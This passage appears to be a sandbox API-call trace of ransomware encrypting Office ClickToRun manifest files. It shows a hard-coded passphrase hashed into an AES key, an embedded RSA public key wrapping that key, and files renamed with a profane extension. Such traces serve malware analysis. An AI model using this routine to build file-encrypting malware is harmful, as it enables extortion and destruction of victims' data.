(lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0235.998] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.998] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.gsg")) returned 0 [0235.998] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32mui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32mui.msi.16.en-us.xml.fuck")) returned 0 [0235.999] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0235.999] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0235.999] CryptReleaseContext (hProv=0x27ff8f8, dwFlags=0x0) returned 1 [0235.999] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.999] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.999] GetLastError () returned 0x5 [0235.999] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml")) returned 0x20 [0235.999] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.999] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.000] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.000] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.000] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ff650) returned 1 [0236.010] CryptCreateHash (in: hProv=0x27ff650, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.010] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.010] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.010] CryptDeriveKey (in: hProv=0x27ff650, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0236.010] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.010] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.010] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff078) returned 1 [0236.013] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff078, dwCertEncodingType=0x1, pInfo=0x27f7098*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f70c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f70d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb560) returned 1 [0236.014] CryptEncrypt (in: hKey=0x27eb560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.014] CryptEncrypt (in: hKey=0x27eb560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff8f8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff8f8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.014] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ff8f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.014] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2802860, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.014] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.014] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.014] CloseHandle (hObject=0xffffffff) returned 1 [0236.014] CloseHandle (hObject=0xffffffff) returned 1 [0236.014] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.015] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.015] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.gsg")) returned 0 [0236.015] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office32ww.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office32ww.msi.16.x-none.xml.fuck")) returned 0 [0236.015] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0236.015] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0236.015] CryptReleaseContext (hProv=0x27ff650, dwFlags=0x0) returned 1 [0236.016] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.016] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.016] GetLastError () returned 0x5 [0236.016] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml")) returned 0x20 [0236.016] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.017] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.017] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.017] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.017] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27fe990) returned 1 [0236.027] CryptCreateHash (in: hProv=0x27fe990, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.027] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.027] CryptHashData (hHash=0x27ebce0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.027] CryptDeriveKey (in: hProv=0x27fe990, Algid=0x6610, hBaseData=0x27ebce0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0236.028] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.028] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.028] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff298) returned 1 [0236.030] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff298, dwCertEncodingType=0x1, pInfo=0x27f6468*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6498*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f64a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb0a0) returned 1 [0236.030] CryptEncrypt (in: hKey=0x27eb0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.030] CryptEncrypt (in: hKey=0x27eb0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fed48*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27fed48*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.031] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fed48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.031] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2802860, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.031] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.031] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.031] CloseHandle (hObject=0xffffffff) returned 1 [0236.031] CloseHandle (hObject=0xffffffff) returned 1 [0236.031] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.031] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.032] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.gsg")) returned 0 [0236.032] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml.fuck")) returned 0 [0236.032] CryptDestroyHash (hHash=0x27ebce0) returned 1 [0236.032] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0236.032] CryptReleaseContext (hProv=0x27fe990, dwFlags=0x0) returned 1 [0236.032] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.032] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.032] GetLastError () returned 0x5 [0236.032] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml")) returned 0x20 [0236.034] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.034] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.034] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.035] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.035] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ff5c8) returned 1 [0236.045] CryptCreateHash (in: hProv=0x27ff5c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.045] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.045] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.045] CryptDeriveKey (in: hProv=0x27ff5c8, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.045] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.045] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.045] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27ff4b8) returned 1 [0236.048] CryptImportPublicKeyInfo (in: hCryptProv=0x27ff4b8, dwCertEncodingType=0x1, pInfo=0x27f7238*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7268*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7270*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb1e0) returned 1 [0236.048] CryptEncrypt (in: hKey=0x27eb1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.048] CryptEncrypt (in: hKey=0x27eb1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff210*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff210*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.048] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ff210, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.048] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2802860, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.048] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2802860*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.048] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2802860, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.048] CloseHandle (hObject=0xffffffff) returned 1 [0236.048] CloseHandle (hObject=0xffffffff) returned 1 [0236.048] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.049] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.049] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.gsg")) returned 0 [0236.049] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml.fuck")) returned 0 [0236.050] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.050] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.050] CryptReleaseContext (hProv=0x27ff5c8, dwFlags=0x0) returned 1 [0236.050] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.050] 